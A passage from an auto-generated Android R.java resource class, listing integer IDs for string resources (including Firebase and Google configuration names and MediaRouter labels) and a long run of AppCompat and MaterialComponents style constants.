int fab_transformation_scrim_behavior=0x7f0a0056; public static final int fab_transformation_sheet_behavior=0x7f0a0057; public static final int firebase_database_url=0x7f0a0063; public static final int gcm_defaultSenderId=0x7f0a0060; public static final int google_api_key=0x7f0a0064; public static final int google_app_id=0x7f0a0061; public static final int google_crash_reporting_api_key=0x7f0a0065; public static final int google_storage_bucket=0x7f0a0066; public static final int hide_bottom_view_on_scroll_behavior=0x7f0a0058; public static final int mr_button_content_description=0x7f0a0012; public static final int mr_cast_button_connected=0x7f0a0013; public static final int mr_cast_button_connecting=0x7f0a0014; public static final int mr_cast_button_disconnected=0x7f0a0015; public static final int mr_cast_dialog_title_view_placeholder=0x7f0a0027; public static final int mr_chooser_searching=0x7f0a0016; public static final int mr_chooser_title=0x7f0a0017; public static final int mr_controller_album_art=0x7f0a0018; public static final int mr_controller_casting_screen=0x7f0a0019; public static final int mr_controller_close_description=0x7f0a001a; public static final int mr_controller_collapse_group=0x7f0a001b; public static final int mr_controller_disconnect=0x7f0a001c; public static final int mr_controller_expand_group=0x7f0a001d; public static final int mr_controller_no_info_available=0x7f0a001e; public static final int mr_controller_no_media_selected=0x7f0a001f; public static final int mr_controller_pause=0x7f0a0020; public static final int mr_controller_play=0x7f0a0021; public static final int mr_controller_stop=0x7f0a0022; public static final int mr_controller_stop_casting=0x7f0a0023; public static final int mr_controller_volume_slider=0x7f0a0024; public static final int mr_dialog_device_header=0x7f0a0028; public static final int mr_dialog_route_header=0x7f0a0029; public static final int mr_system_route_name=0x7f0a0025; public static final int mr_user_route_category_name=0x7f0a0026; public static final int mtrl_chip_close_icon_content_description=0x7f0a0059; public static final int password_toggle_content_description=0x7f0a005a; public static final int path_password_eye=0x7f0a005b; public static final int path_password_eye_mask_strike_through=0x7f0a005c; public static final int path_password_eye_mask_visible=0x7f0a005d; public static final int path_password_strike_through=0x7f0a005e; public static final int project_id=0x7f0a0067; public static final int search_menu_title=0x7f0a0045; public static final int status_bar_notification_info_overflow=0x7f0a005f; } public static final class style { public static final int AlertDialog_AppCompat=0x7f0e0098; public static final int AlertDialog_AppCompat_Light=0x7f0e0099; public static final int Animation_AppCompat_Dialog=0x7f0e009a; public static final int Animation_AppCompat_DropDownUp=0x7f0e009b; public static final int Animation_AppCompat_Tooltip=0x7f0e009c; public static final int Animation_Design_BottomSheetDialog=0x7f0e016d; public static final int AppCompatDialogStyle=0x7f0e0201; public static final int Base_AlertDialog_AppCompat=0x7f0e009d; public static final int Base_AlertDialog_AppCompat_Light=0x7f0e009e; public static final int Base_Animation_AppCompat_Dialog=0x7f0e009f; public static final int Base_Animation_AppCompat_DropDownUp=0x7f0e00a0; public static final int Base_Animation_AppCompat_Tooltip=0x7f0e00a1; public static final int Base_CardView=0x7f0e000c; public static final int Base_DialogWindowTitle_AppCompat=0x7f0e00a2; public static final int Base_DialogWindowTitleBackground_AppCompat=0x7f0e00a3; public static final int Base_TextAppearance_AppCompat=0x7f0e002c; public static final int Base_TextAppearance_AppCompat_Body1=0x7f0e002d; public static final int Base_TextAppearance_AppCompat_Body2=0x7f0e002e; public static final int Base_TextAppearance_AppCompat_Button=0x7f0e002f; public static final int Base_TextAppearance_AppCompat_Caption=0x7f0e0030; public static final int Base_TextAppearance_AppCompat_Display1=0x7f0e0031; public static final int Base_TextAppearance_AppCompat_Display2=0x7f0e0032; public static final int Base_TextAppearance_AppCompat_Display3=0x7f0e0033; public static final int Base_TextAppearance_AppCompat_Display4=0x7f0e0034; public static final int Base_TextAppearance_AppCompat_Headline=0x7f0e0035; public static final int Base_TextAppearance_AppCompat_Inverse=0x7f0e0036; public static final int Base_TextAppearance_AppCompat_Large=0x7f0e0037; public static final int Base_TextAppearance_AppCompat_Large_Inverse=0x7f0e0038; public static final int Base_TextAppearance_AppCompat_Light_Widget_PopupMenu_Large=0x7f0e0039; public static final int Base_TextAppearance_AppCompat_Light_Widget_PopupMenu_Small=0x7f0e003a; public static final int Base_TextAppearance_AppCompat_Medium=0x7f0e003b; public static final int Base_TextAppearance_AppCompat_Medium_Inverse=0x7f0e003c; public static final int Base_TextAppearance_AppCompat_Menu=0x7f0e003d; public static final int Base_TextAppearance_AppCompat_SearchResult=0x7f0e00a4; public static final int Base_TextAppearance_AppCompat_SearchResult_Subtitle=0x7f0e003e; public static final int Base_TextAppearance_AppCompat_SearchResult_Title=0x7f0e003f; public static final int Base_TextAppearance_AppCompat_Small=0x7f0e0040; public static final int Base_TextAppearance_AppCompat_Small_Inverse=0x7f0e0041; public static final int Base_TextAppearance_AppCompat_Subhead=0x7f0e0042; public static final int Base_TextAppearance_AppCompat_Subhead_Inverse=0x7f0e00a5; public static final int Base_TextAppearance_AppCompat_Title=0x7f0e0043; public static final int Base_TextAppearance_AppCompat_Title_Inverse=0x7f0e00a6; public static final int Base_TextAppearance_AppCompat_Tooltip=0x7f0e00a7; public static final int Base_TextAppearance_AppCompat_Widget_ActionBar_Menu=0x7f0e0087; public static final int Base_TextAppearance_AppCompat_Widget_ActionBar_Subtitle=0x7f0e0044; public static final int Base_TextAppearance_AppCompat_Widget_ActionBar_Subtitle_Inverse=0x7f0e0045; public static final int Base_TextAppearance_AppCompat_Widget_ActionBar_Title=0x7f0e0046; public static final int Base_TextAppearance_AppCompat_Widget_ActionBar_Title_Inverse=0x7f0e0047; public static final int Base_TextAppearance_AppCompat_Widget_ActionMode_Subtitle=0x7f0e0048; public static final int Base_TextAppearance_AppCompat_Widget_ActionMode_Title=0x7f0e0049; public static final int Base_TextAppearance_AppCompat_Widget_Button=0x7f0e004a; public static final int Base_TextAppearance_AppCompat_Widget_Button_Borderless_Colored=0x7f0e008e; public static final int Base_TextAppearance_AppCompat_Widget_Button_Colored=0x7f0e008f; public static final int Base_TextAppearance_AppCompat_Widget_Button_Inverse=0x7f0e0088; public static final int Base_TextAppearance_AppCompat_Widget_DropDownItem=0x7f0e00a8; public static final int Base_TextAppearance_AppCompat_Widget_PopupMenu_Header=0x7f0e004b; public static final int Base_TextAppearance_AppCompat_Widget_PopupMenu_Large=0x7f0e004c; public static final int Base_TextAppearance_AppCompat_Widget_PopupMenu_Small=0x7f0e004d; public static final int Base_TextAppearance_AppCompat_Widget_Switch=0x7f0e004e; public static final int Base_TextAppearance_AppCompat_Widget_TextView_SpinnerItem=0x7f0e004f; public static final int Base_TextAppearance_Widget_AppCompat_ExpandedMenu_Item=0x7f0e00a9; public static final int Base_TextAppearance_Widget_AppCompat_Toolbar_Subtitle=0x7f0e0050; public static final int Base_TextAppearance_Widget_AppCompat_Toolbar_Title=0x7f0e0051; public static final int Base_Theme_AppCompat=0x7f0e0052; public static final int Base_Theme_AppCompat_CompactMenu=0x7f0e00aa; public static final int Base_Theme_AppCompat_Dialog=0x7f0e0053; public static final int Base_Theme_AppCompat_Dialog_Alert=0x7f0e00ab; public static final int Base_Theme_AppCompat_Dialog_FixedSize=0x7f0e00ac; public static final int Base_Theme_AppCompat_Dialog_MinWidth=0x7f0e00ad; public static final int Base_Theme_AppCompat_DialogWhenLarge=0x7f0e0010; public static final int Base_Theme_AppCompat_Light=0x7f0e0054; public static final int Base_Theme_AppCompat_Light_DarkActionBar=0x7f0e00ae; public static final int Base_Theme_AppCompat_Light_Dialog=0x7f0e0055; public static final int Base_Theme_AppCompat_Light_Dialog_Alert=0x7f0e00af; public static final int Base_Theme_AppCompat_Light_Dialog_FixedSize=0x7f0e00b0; public static final int Base_Theme_AppCompat_Light_Dialog_MinWidth=0x7f0e00b1; public static final int Base_Theme_AppCompat_Light_DialogWhenLarge=0x7f0e0011; public static final int Base_Theme_MaterialComponents=0x7f0e016e; public static final int Base_Theme_MaterialComponents_Bridge=0x7f0e016f; public static final int Base_Theme_MaterialComponents_CompactMenu=0x7f0e0170; public static final int Base_Theme_MaterialComponents_Dialog=0x7f0e0171; public static final int Base_Theme_MaterialComponents_Dialog_Alert=0x7f0e0172; public static final int Base_Theme_MaterialComponents_Dialog_FixedSize=0x7f0e0173; public static final int Base_Theme_MaterialComponents_Dialog_MinWidth=0x7f0e0174; public static final int Base_Theme_MaterialComponents_DialogWhenLarge=0x7f0e0167; public static final int Base_Theme_MaterialComponents_Light=0x7f0e0175; public static final int Base_Theme_MaterialComponents_Light_Bridge=0x7f0e0176; public static final int Base_Theme_MaterialComponents_Light_DarkActionBar=0x7f0e0177; public static final int Base_Theme_MaterialComponents_Light_DarkActionBar_Bridge=0x7f0e0178; public static final int Base_Theme_MaterialComponents_Light_Dialog=0x7f0e0179; public static final int Base_Theme_MaterialComponents_Light_Dialog_Alert=0x7f0e017a; public static final int Base_Theme_MaterialComponents_Light_Dialog_FixedSize=0x7f0e017b; public static final int Base_Theme_MaterialComponents_Light_Dialog_MinWidth=0x7f0e017c; public static final int Base_Theme_MaterialComponents_Light_DialogWhenLarge=0x7f0e0168; public static final int Base_ThemeOverlay_AppCompat=0x7f0e00b2; public static final int Base_ThemeOverlay_AppCompat_ActionBar=0x7f0e00b3; public static final int Base_ThemeOverlay_AppCompat_Dark=0x7f0e00b4; public static final int Base_ThemeOverlay_AppCompat_Dark_ActionBar=0x7f0e00b5; public static final int Base_ThemeOverlay_AppCompat_Dialog=0x7f0e0056; public static final int Base_ThemeOverlay_AppCompat_Dialog_Alert=0x7f0e00b6; public static final int Base_ThemeOverlay_AppCompat_Light=0x7f0e00b7; public static final int Base_ThemeOverlay_MaterialComponents_Dialog=0x7f0e017d; public static final int Base_ThemeOverlay_MaterialComponents_Dialog_Alert=0x7f0e017e; public static final int Base_V14_Theme_MaterialComponents=0x7f0e017f; public static final int Base_V14_Theme_MaterialComponents_Bridge=0x7f0e0180; public static final int Base_V14_Theme_MaterialComponents_Dialog=0x7f0e0181; public static final int Base_V14_Theme_MaterialComponents_Light=0x7f0e0182; public static final int Base_V14_Theme_MaterialComponents_Light_Bridge=0x7f0e0183; public static final int Base_V14_Theme_MaterialComponents_Light_DarkActionBar_Bridge=0x7f0e0184; public static final int Base_V14_Theme_MaterialComponents_Light_Dialog=0x7f0e0185; public static final int Base_V14_ThemeOverlay_MaterialComponents_Dialog=0x7f0e0186; public static final int Base_V14_ThemeOverlay_MaterialComponents_Dialog_Alert=0x7f0e0187; public static final int Base_V21_Theme_AppCompat=0x7f0e0057; public static final int Base_V21_Theme_AppCompat_Dialog=0x7f0e0058; public static final int Base_V21_Theme_AppCompat_Light=0x7f0e0059; public static final int Base_V21_Theme_AppCompat_Light_Dialog=0x7f0e005a; public static final int Base_V21_ThemeOverlay_AppCompat_Dialog=0x7f0e005b; public static final int Base_V22_Theme_AppCompat=0x7f0e0085; public static final int Base_V22_Theme_AppCompat_Light=0x7f0e0086; public static final int Base_V23_Theme_AppCompat=0x7f0e0089; public static final int Base_V23_Theme_AppCompat_Light=0x7f0e008a; public static final int Base_V26_Theme_AppCompat=0x7f0e0092; public static final int Base_V26_Theme_AppCompat_Light=0x7f0e0093; public static final int Base_V26_Widget_AppCompat_Toolbar=0x7f0e0094; public static final int Base_V28_Theme_AppCompat=0x7f0e0096; public static final int Base_V28_Theme_AppCompat_Light=0x7f0e0097; public static final int Base_V7_Theme_AppCompat=0x7f0e00b8; public static final int Base_V7_Theme_AppCompat_Dialog=0x7f0e00b9; public static final int Base_V7_Theme_AppCompat_Light=0x7f0e00ba; public static final int Base_V7_Theme_AppCompat_Light_Dialog=0x7f0e00bb; public static final int Base_V7_ThemeOverlay_AppCompat_Dialog=0x7f0e00bc; public static final int Base_V7_Widget_AppCompat_AutoCompleteTextView=0x7f0e00bd; public static final int Base_V7_Widget_AppCompat_EditText=0x7f0e00be; public static final int Base_V7_Widget_AppCompat_Toolbar=0x7f0e00bf; public static final int Base_Widget_AppCompat_ActionBar=0x7f0e00c0; public static final int Base_Widget_AppCompat_ActionBar_Solid=0x7f0e00c1; public static final int Base_Widget_AppCompat_ActionBar_TabBar=0x7f0e00c2; public static final int Base_Widget_AppCompat_ActionBar_TabText=0x7f0e005c; public static final int Base_Widget_AppCompat_ActionBar_TabView=0x7f0e005d; public static final int Base_Widget_AppCompat_ActionButton=0x7f0e005e; public static final int Base_Widget_AppCompat_ActionButton_CloseMode=0x7f0e005f; public static final int Base_Widget_AppCompat_ActionButton_Overflow=0x7f0e0060; public static final int Base_Widget_AppCompat_ActionMode=0x7f0e00c3; public static final int Base_Widget_AppCompat_ActivityChooserView=0x7f0e00c4; public static final int Base_Widget_AppCompat_AutoCompleteTextView=0x7f0e0061; public static final int Base_Widget_AppCompat_Button=0x7f0e0062; public static final int Base_Widget_AppCompat_Button_Borderless=0x7f0e0063; public static final int Base_Widget_AppCompat_Button_Borderless_Colored=0x7f0e0064; public static final int Base_Widget_AppCompat_Button_ButtonBar_AlertDialog=0x7f0e00c5; public static final int Base_Widget_AppCompat_Button_Colored=0x7f0e008b; public static final int Base_Widget_AppCompat_Button_Small=0x7f0e0065; public static final int Base_Widget_AppCompat_ButtonBar=0x7f0e0066; public static final int Base_Widget_AppCompat_ButtonBar_AlertDialog=0x7f0e00c6; public static final int Base_Widget_AppCompat_CompoundButton_CheckBox=0x7f0e0067; public static final int Base_Widget_AppCompat_CompoundButton_RadioButton=0x7f0e0068; public static final int Base_Widget_AppCompat_CompoundButton_Switch=0x7f0e00c7; public static final int Base_Widget_AppCompat_DrawerArrowToggle=0x7f0e000f; public static final int Base_Widget_AppCompat_DrawerArrowToggle_Common=0x7f0e00c8; public static final int Base_Widget_AppCompat_DropDownItem_Spinner=0x7f0e0069; public static final int Base_Widget_AppCompat_EditText=0x7f0e006a; public static final int Base_Widget_AppCompat_ImageButton=0x7f0e006b; public static final int Base_Widget_AppCompat_Light_ActionBar=0x7f0e00c9; public static final int Base_Widget_AppCompat_Light_ActionBar_Solid=0x7f0e00ca; public static final int Base_Widget_AppCompat_Light_ActionBar_TabBar=0x7f0e00cb; public static final int Base_Widget_AppCompat_Light_ActionBar_TabText=0x7f0e006c; public static final int Base_Widget_AppCompat_Light_ActionBar_TabText_Inverse=0x7f0e006d; public static final int Base_Widget_AppCompat_Light_ActionBar_TabView=0x7f0e006e; public static final int Base_Widget_AppCompat_Light_PopupMenu=0x7f0e006f; public static final int Base_Widget_AppCompat_Light_PopupMenu_Overflow=0x7f0e0070; public static final int Base_Widget_AppCompat_ListMenuView=0x7f0e00cc; public static final int Base_Widget_AppCompat_ListPopupWindow=0x7f0e0071; public static final int Base_Widget_AppCompat_ListView=0x7f0e0072; public static final int Base_Widget_AppCompat_ListView_DropDown=0x7f0e0073; public static final int Base_Widget_AppCompat_ListView_Menu=0x7f0e0074; public static final int Base_Widget_AppCompat_PopupMenu=0x7f0e0075; public static final int Base_Widget_AppCompat_PopupMenu_Overflow=0x7f0e0076; public static final int Base_Widget_AppCompat_PopupWindow=0x7f0e00cd; public static final int Base_Widget_AppCompat_ProgressBar=0x7f0e0077; public static final int Base_Widget_AppCompat_ProgressBar_Horizontal=0x7f0e0078; public static final int Base_Widget_AppCompat_RatingBar=0x7f0e0079; public static final int Base_Widget_AppCompat_RatingBar_Indicator=0x7f0e008c; public static final int Base_Widget_AppCompat_RatingBar_Small=0x7f0e008d; public static final int Base_Widget_AppCompat_SearchView=0x7f0e00ce; public static final int Base_Widget_AppCompat_SearchView_ActionBar=0x7f0e00cf; public static final int Base_Widget_AppCompat_SeekBar=0x7f0e007a; public static final int Base_Widget_AppCompat_SeekBar_Discrete=0x7f0e00d0; public static final int Base_Widget_AppCompat_Spinner=0x7f0e007b; public static final int Base_Widget_AppCompat_Spinner_Underlined=0x7f0e0012; public static final int Base_Widget_AppCompat_TextView_SpinnerItem=0x7f0e007c; public static final int Base_Widget_AppCompat_Toolbar=0x7f0e0095; public static final int Base_Widget_AppCompat_Toolbar_Button_Navigation=0x7f0e007d; public static final int Base_Widget_Design_TabLayout=0x7f0e0188; public static final int Base_Widget_MaterialComponents_Chip=0x7f0e0189; public static final int Base_Widget_MaterialComponents_TextInputEditText=0x7f0e018a; public static final int Base_Widget_MaterialComponents_TextInputLayout=0x7f0e018b; public static final int CardView=0x7f0e000b; public static final int CardView_Dark=0x7f0e000d; public static final int CardView_Light=0x7f0e000e; public static final int MainTheme=0x7f0e01ff; /** Base theme applied no matter what API */ public static final int MainTheme_Base=0x7f0e0200; public static final int Platform_AppCompat=0x7f0e007e; public static final int Platform_AppCompat_Light=0x7f0e007f; public static final int Platform_MaterialComponents=0x7f0e018c; public static final int Platform_MaterialComponents_Dialog=0x7f0e018d; public static final int Platform_MaterialComponents_Light=0x7f0e018e; public static final int Platform_MaterialComponents_Light_Dialog=0x7f0e018f; public static final int Platform_ThemeOverlay_AppCompat=0x7f0e0080; public static final int Platform_ThemeOverlay_AppCompat_Dark=0x7f0e0081; public static final int Platform_ThemeOverlay_AppCompat_Light=0x7f0e0082; public static final int Platform_V21_AppCompat=0x7f0e0083; public static final int Platform_V21_AppCompat_Light=0x7f0e0084; public static final int Platform_V25_AppCompat=0x7f0e0090; public static final int Platform_V25_AppCompat_Light=0x7f0e0091; public static final int Platform_Widget_AppCompat_Spinner=0x7f0e00d1; public static final int RtlOverlay_DialogWindowTitle_AppCompat=0x7f0e001b; public static final int RtlOverlay_Widget_AppCompat_ActionBar_TitleItem=0x7f0e001c; public static final int RtlOverlay_Widget_AppCompat_DialogTitle_Icon=0x7f0e001d; public static final int RtlOverlay_Widget_AppCompat_PopupMenuItem=0x7f0e001e; public static final int RtlOverlay_Widget_AppCompat_PopupMenuItem_InternalGroup=0x7f0e001f; public static final int RtlOverlay_Widget_AppCompat_PopupMenuItem_Shortcut=0x7f0e0020; public static final int RtlOverlay_Widget_AppCompat_PopupMenuItem_SubmenuArrow=0x7f0e0021; public static final int RtlOverlay_Widget_AppCompat_PopupMenuItem_Text=0x7f0e0022; public static final int RtlOverlay_Widget_AppCompat_PopupMenuItem_Title=0x7f0e0023; public static final int RtlOverlay_Widget_AppCompat_Search_DropDown=0x7f0e0024; public static final int RtlOverlay_Widget_AppCompat_Search_DropDown_Icon1=0x7f0e0025; public static final int RtlOverlay_Widget_AppCompat_Search_DropDown_Icon2=0x7f0e0026; public static final int RtlOverlay_Widget_AppCompat_Search_DropDown_Query=0x7f0e0027; public static final int RtlOverlay_Widget_AppCompat_Search_DropDown_Text=0x7f0e0028; public static final int RtlOverlay_Widget_AppCompat_SearchView_MagIcon=0x7f0e0029; public static final int RtlUnderlay_Widget_AppCompat_ActionButton=0x7f0e002a; public static final int RtlUnderlay_Widget_AppCompat_ActionButton_Overflow=0x7f0e002b; public static final int TextAppearance_AppCompat=0x7f0e00d2; public static final int TextAppearance_AppCompat_Body1=0x7f0e00d3; public static final int TextAppearance_AppCompat_Body2=0x7f0e00d4; public static final int TextAppearance_AppCompat_Button=0x7f0e00d5; public static final int TextAppearance_AppCompat_Caption=0x7f0e00d6; public static final int TextAppearance_AppCompat_Display1=0x7f0e00d7; public static final int TextAppearance_AppCompat_Display2=0x7f0e00d8; public static final int TextAppearance_AppCompat_Display3=0x7f0e00d9; public static final int TextAppearance_AppCompat_Display4=0x7f0e00da; public static final int TextAppearance_AppCompat_Headline=0x7f0e00db; public static final int TextAppearance_AppCompat_Inverse=0x7f0e00dc; public static final int TextAppearance_AppCompat_Large=0x7f0e00dd; public static final int TextAppearance_AppCompat_Large_Inverse=0x7f0e00de; public static final int TextAppearance_AppCompat_Light_SearchResult_Subtitle=0x7f0e00df; public static final int TextAppearance_AppCompat_Light_SearchResult_Title=0x7f0e00e0; public static final int TextAppearance_AppCompat_Light_Widget_PopupMenu_Large=0x7f0e00e1; public static final int TextAppearance_AppCompat_Light_Widget_PopupMenu_Small=0x7f0e00e2; public static final int TextAppearance_AppCompat_Medium=0x7f0e00e3; public static final int TextAppearance_AppCompat_Medium_Inverse=0x7f0e00e4; public static final int TextAppearance_AppCompat_Menu=0x7f0e00e5; public static final int TextAppearance_AppCompat_SearchResult_Subtitle=0x7f0e00e6; public static final int TextAppearance_AppCompat_SearchResult_Title=0x7f0e00e7; public static final int TextAppearance_AppCompat_Small=0x7f0e00e8; public static final int TextAppearance_AppCompat_Small_Inverse=0x7f0e00e9; public static final int TextAppearance_AppCompat_Subhead=0x7f0e00ea; public static final int TextAppearance_AppCompat_Subhead_Inverse=0x7f0e00eb; public static final int TextAppearance_AppCompat_Title=0x7f0e00ec; public static final int TextAppearance_AppCompat_Title_Inverse=0x7f0e00ed; public static final int TextAppearance_AppCompat_Tooltip=0x7f0e001a; public static final int TextAppearance_AppCompat_Widget_ActionBar_Menu=0x7f0e00ee; public static final int TextAppearance_AppCompat_Widget_ActionBar_Subtitle=0x7f0e00ef; public static final int TextAppearance_AppCompat_Widget_ActionBar_Subtitle_Inverse=0x7f0e00f0; public static final int TextAppearance_AppCompat_Widget_ActionBar_Title=0x7f0e00f1; public static final int TextAppearance_AppCompat_Widget_ActionBar_Title_Inverse=0x7f0e00f2; public static final int TextAppearance_AppCompat_Widget_ActionMode_Subtitle=0x7f0e00f3; public static final int TextAppearance_AppCompat_Widget_ActionMode_Subtitle_Inverse=0x7f0e00f4; public static final int TextAppearance_AppCompat_Widget_ActionMode_Title=0x7f0e00f5; public static final int TextAppearance_AppCompat_Widget_ActionMode_Title_Inverse=0x7f0e00f6; public static final int TextAppearance_AppCompat_Widget_Button=0x7f0e00f7; public static final int TextAppearance_AppCompat_Widget_Button_Borderless_Colored=0x7f0e00f8; public static final int TextAppearance_AppCompat_Widget_Button_Colored=0x7f0e00f9; public static final int TextAppearance_AppCompat_Widget_Button_Inverse=0x7f0e00fa; public static final int TextAppearance_AppCompat_Widget_DropDownItem=0x7f0e00fb; public static final int TextAppearance_AppCompat_Widget_PopupMenu_Header=0x7f0e00fc; public static final int TextAppearance_AppCompat_Widget_PopupMenu_Large=0x7f0e00fd; public static final int TextAppearance_AppCompat_Widget_PopupMenu_Small=0x7f0e00fe; public static final int TextAppearance_AppCompat_Widget_Switch=0x7f0e00ff; public static final int TextAppearance_AppCompat_Widget_TextView_SpinnerItem=0x7f0e0100; public static final int TextAppearance_Compat_Notification=0x7f0e01f8; public static final int TextAppearance_Compat_Notification_Info=0x7f0e01f9; public static final int TextAppearance_Compat_Notification_Info_Media=0x7f0e0161; public static final int TextAppearance_Compat_Notification_Line2=0x7f0e01fe; public static final int TextAppearance_Compat_Notification_Line2_Media=0x7f0e0165; public static final int TextAppearance_Compat_Notification_Media=0x7f0e0162; public static final int TextAppearance_Compat_Notification_Time=0x7f0e01fa; public static final int TextAppearance_Compat_Notification_Time_Media=0x7f0e0163; public static final int TextAppearance_Compat_Notification_Title=0x7f0e01fb; public static final int TextAppearance_Compat_Notification_Title_Media=0x7f0e0164; public static final int TextAppearance_Design_CollapsingToolbar_Expanded=0x7f0e0190; public static final int TextAppearance_Design_Counter=0x7f0e0191; public static final int TextAppearance_Design_Counter_Overflow=0x7f0e0192; public static final int TextAppearance_Design_Error=0x7f0e0193; public static final int TextAppearance_Design_HelperText=0x7f0e0194; public static final int TextAppearance_Design_Hint=0x7f0e0195; public static final int TextAppearance_Design_Snackbar_Message=0x7f0e0196; public static final int TextAppearance_Design_Tab=0x7f0e0197; public static final int TextAppearance_MaterialComponents_Body1=0x7f0e0198; public static final int TextAppearance_MaterialComponents_Body2=0x7f0e0199; public static final int TextAppearance_MaterialComponents_Button=0x7f0e0169; public static final int TextAppearance_MaterialComponents_Caption=0x7f0e019a; public static final int TextAppearance_MaterialComponents_Chip=0x7f0e019b; public static final int TextAppearance_MaterialComponents_Headline1=0x7f0e019c; public static final int TextAppearance_MaterialComponents_Headline2=0x7f0e019d; public static final int TextAppearance_MaterialComponents_Headline3=0x7f0e019e; public static final int TextAppearance_MaterialComponents_Headline4=0x7f0e019f; public static final int TextAppearance_MaterialComponents_Headline5=0x7f0e01a0; public static final int TextAppearance_MaterialComponents_Headline6=0x7f0e016a; public static final int TextAppearance_MaterialComponents_Overline=0x7f0e016b; public static final int TextAppearance_MaterialComponents_Subtitle1=0x7f0e01a1; public static final int TextAppearance_MaterialComponents_Subtitle2=0x7f0e016c; public static final int TextAppearance_MaterialComponents_Tab=0x7f0e01a2; public static final int TextAppearance_MediaRouter_PrimaryText=0x7f0e0000; public static final int TextAppearance_MediaRouter_SecondaryText=0x7f0e0001; public static final int TextAppearance_MediaRouter_Title=0x7f0e0002; public static final int TextAppearance_Widget_AppCompat_ExpandedMenu_Item=0x7f0e0101; public static final int TextAppearance_Widget_AppCompat_Toolbar_Subtitle=0x7f0e0102; public static final int TextAppearance_Widget_AppCompat_Toolbar_Title=0x7f0e0103; public static final int Theme_AppCompat=0x7f0e0104; public static final int Theme_AppCompat_CompactMenu=0x7f0e0105; public static final int Theme_AppCompat_DayNight=0x7f0e0013; public static final int Theme_AppCompat_DayNight_DarkActionBar=0x7f0e0014; public static final int Theme_AppCompat_DayNight_Dialog=0x7f0e0015; public static final int Theme_AppCompat_DayNight_Dialog_Alert=0x7f0e0016; public static final int Theme_AppCompat_DayNight_Dialog_MinWidth=0x7f0e0017; public static final int Theme_AppCompat_DayNight_DialogWhenLarge=0x7f0e0018; public static final int Theme_AppCompat_DayNight_NoActionBar=0x7f0e0019; public static final int Theme_AppCompat_Dialog=0x7f0e0106; public static final int Theme_AppCompat_Dialog_Alert=0x7f0e0107; public static final int Theme_AppCompat_Dialog_MinWidth=0x7f0e0108; public static final int Theme_AppCompat_DialogWhenLarge=0x7f0e0109; public static final int Theme_AppCompat_Light=0x7f0e010a; public static final int Theme_AppCompat_Light_DarkActionBar=0x7f0e010b; public static final int Theme_AppCompat_Light_Dialog=0x7f0e010c; public static final int Theme_AppCompat_Light_Dialog_Alert=0x7f0e010d; public static final int Theme_AppCompat_Light_Dialog_MinWidth=0x7f0e010e; public static final int Theme_AppCompat_Light_DialogWhenLarge=0x7f0e010f; public static final int Theme_AppCompat_Light_NoActionBar=0x7f0e0110; public static final int Theme_AppCompat_NoActionBar=0x7f0e0111; public static final int Theme_Design=0x7f0e01a3; public static final int Theme_Design_BottomSheetDialog=0x7f0e01a4; public static final int Theme_Design_Light=0x7f0e01a5; public static final int Theme_Design_Light_BottomSheetDialog=0x7f0e01a6; public static final int Theme_Design_Light_NoActionBar=0x7f0e01a7; public static final int Theme_Design_NoActionBar=0x7f0e01a8; public static final int Theme_MaterialComponents=0x7f0e01a9; public static final int Theme_MaterialComponents_BottomSheetDialog=0x7f0e01aa; public static final int Theme_MaterialComponents_Bridge=0x7f0e01ab; public static final int Theme_MaterialComponents_CompactMenu=0x7f0e01ac; public static final int Theme_MaterialComponents_Dialog=0x7f0e01ad; public static final int Theme_MaterialComponents_Dialog_Alert=0x7f0e01ae; public static final int Theme_MaterialComponents_Dialog_MinWidth=0x7f0e01af; public static final int Theme_MaterialComponents_DialogWhenLarge=0x7f0e01b0; public static final int Theme_MaterialComponents_Light=0x7f0e01b1; public static final int Theme_MaterialComponents_Light_BottomSheetDialog=0x7f0e01b2; public static final int Theme_MaterialComponents_Light_Bridge=0x7f0e01b3; public static final int Theme_MaterialComponents_Light_DarkActionBar=0x7f0e01b4; public static final int Theme_MaterialComponents_Light_DarkActionBar_Bridge=0x7f0e01b5; public static final int Theme_MaterialComponents_Light_Dialog=0x7f0e01b6; public static final int Theme_MaterialComponents_Light_Dialog_Alert=0x7f0e01b7; public static final int Theme_MaterialComponents_Light_Dialog_MinWidth=0x7f0e01b8; public static final int Theme_MaterialComponents_Light_DialogWhenLarge=0x7f0e01b9; public static final int Theme_MaterialComponents_Light_NoActionBar=0x7f0e01ba; public static final int Theme_MaterialComponents_Light_NoActionBar_Bridge=0x7f0e01bb; public static final int Theme_MaterialComponents_NoActionBar=0x7f0e01bc; public static final int Theme_MaterialComponents_NoActionBar_Bridge=0x7f0e01bd; public static final int Theme_MediaRouter=0x7f0e0003; public static final int Theme_MediaRouter_Light=0x7f0e0004; public static final int Theme_MediaRouter_Light_DarkControlPanel=0x7f0e0005; public static final int Theme_MediaRouter_LightControlPanel=0x7f0e0006; public static final int ThemeOverlay_AppCompat=0x7f0e0112; public static final int ThemeOverlay_AppCompat_ActionBar=0x7f0e0113; public static final int ThemeOverlay_AppCompat_Dark=0x7f0e0114; public static final int ThemeOverlay_AppCompat_Dark_ActionBar=0x7f0e0115; public static final int ThemeOverlay_AppCompat_Dialog=0x7f0e0116; public static final int ThemeOverlay_AppCompat_Dialog_Alert=0x7f0e0117; public static final int ThemeOverlay_AppCompat_Light=0x7f0e0118; public static final int ThemeOverlay_MaterialComponents=0x7f0e01be; public static final int ThemeOverlay_MaterialComponents_ActionBar=0x7f0e01bf; public static final int ThemeOverlay_MaterialComponents_Dark=0x7f0e01c0; public static final int ThemeOverlay_MaterialComponents_Dark_ActionBar=0x7f0e01c1; public static final int ThemeOverlay_MaterialComponents_Dialog=0x7f0e01c2; public static final int ThemeOverlay_MaterialComponents_Dialog_Alert=0x7f0e01c3; public static final int ThemeOverlay_MaterialComponents_Light=0x7f0e01c4; public static final int ThemeOverlay_MaterialComponents_TextInputEditText=0x7f0e01c5; public static final int ThemeOverlay_MaterialComponents_TextInputEditText_FilledBox=0x7f0e01c6; public static final int ThemeOverlay_MaterialComponents_TextInputEditText_FilledBox_Dense=0x7f0e01c7; public static final int ThemeOverlay_MaterialComponents_TextInputEditText_OutlinedBox=0x7f0e01c8; public static final int ThemeOverlay_MaterialComponents_TextInputEditText_OutlinedBox_Dense=0x7f0e01c9; public static final int ThemeOverlay_MediaRouter_Dark=0x7f0e0007; public static final int ThemeOverlay_MediaRouter_Light=0x7f0e0008; public static final int Widget_AppCompat_ActionBar=0x7f0e0119; public static final int Widget_AppCompat_ActionBar_Solid=0x7f0e011a; public static final int Widget_AppCompat_ActionBar_TabBar=0x7f0e011b; public static final int Widget_AppCompat_ActionBar_TabText=0x7f0e011c; public static final int Widget_AppCompat_ActionBar_TabView=0x7f0e011d; 